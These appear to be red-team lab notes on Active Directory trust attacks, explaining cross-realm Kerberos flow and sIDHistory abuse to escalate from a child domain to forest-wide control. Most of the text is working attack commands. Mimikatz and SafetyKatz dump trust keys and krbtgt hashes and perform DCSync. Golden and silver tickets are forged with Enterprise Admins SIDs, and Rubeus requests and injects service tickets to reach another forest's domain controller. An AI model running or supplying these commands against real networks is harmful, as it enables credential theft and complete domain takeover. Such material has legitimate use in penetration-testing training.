- Request TGT
- Receive TGT
- Show TGT, Request TGS for service outside domain
- Receive inter-realm TGT which is encrypted by the Trust Key.
- Request TGS
- Receive TGS
- Present TGS for access
- Opt Mutual Auth
We need the trust key to forge 5 and we need to modify sIDHistory to gain higher privileges.
- sIDHistory is a user attribute designed for scenarios where a user is moved from one domain to another. When a user’s domain is changed, they get a new SID and the old SID is added to sIDHistory.
- sIDHistory can be abused in two ways of escalating privileges within a forest:
- krbtgt hash of the child
- Trust Tickets
Using Trust Key
Invoke-Mimikatz -Command '"lsadump::trust /patch"'Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\other-forest-account$"'Invoke-Mimikatz -Command '"lsadump::lsa /patch"'C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:current.domain.name /sid:see_bloodhound /sids:see_bloodhound /rc4:ntlm_hash /service:krbtgt /target:domain.name /ticket:path_to_ticket.kirbi" "exit"| Options | Description |
|---|---|
| kerberos::golden | Module name |
| /domain:current_domain.name | FQDN of the current domain |
| /sid:S-1-xxxxx | SID of the current domain |
| /sids:domainsid,objectid | SID of the enterprise admins group of the parent domain |
| /rc4:ntlm_hash | RC4 of the trust key |
| /user:Administrator | User to impersonate |
| /service:krbtgt | Target service in the parent domain |
| /target:domain.name | FQDN of the parent domain |
| /ticket:path_to_ticket.kirbi | Path where ticket is to be saved |
| Using the trust ticket, we can request a TGS |
.\asktgs.exe C:\AD\Tools\trust_tkt.kirbi CIFS/other-forest-dc-fqdn.\Rubeus.exe asktgs /ticket:path_to_tgtticket.kirbi /service:http/forest-dc.domain.name /dc:domain-controller-fqdn /pttNow, access the DC of the other forest. HOST and RPCSS for WMI, HTTP for PowerShell Remoting and WinRM can be created as well.
.\kirbikator.exe lsa .\CIFS.other-forest-dc-fqdn.kirbiNow access the DC of the other forest
C:\AD\Tools\Rubeus.exe silver /service:krbtgt/current-domain-name /rc4:trust_key_ntlm /sid:current_domain /sids:S-1-XXXXX-519 /ldap /user:Administrator /nowrap| Options | Description |
|---|---|
| silver | Name of the module |
| /rc4:ntlm | NTLM hash of the trust key |
| /sid:domainsid | SID of the current domain |
| /sids:S-1-XXXXX-519 | SID of the Enterprise Admins group of the parent domain |
| /ldap | Retrieve PAC information from the current domain DC |
| /user:Administrator | Username for which the TGT is generated |
| /nowrap | No newlines in the output |
C:\AD\Tools\Rubeus.exe asktgs /service:servicename/other-forest-dc-fqdn /dc:other-forest-dc-fqdn /ptt /ticket:path_to_forged_ticket.kirbiUsing krbtgt hash
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:current.domain.name /sid:current-domain-SID /sids:set SID history to enterprise admins /krbtgt:ntlm_hash /ptt" "exit"Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'ls \\forest-dc.fqdn\C$
gwmi -class win32_operatingsystem -ComputerName forest-dc-fqdn
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:forest-name\krbtgt /domain:forest.name" "exit"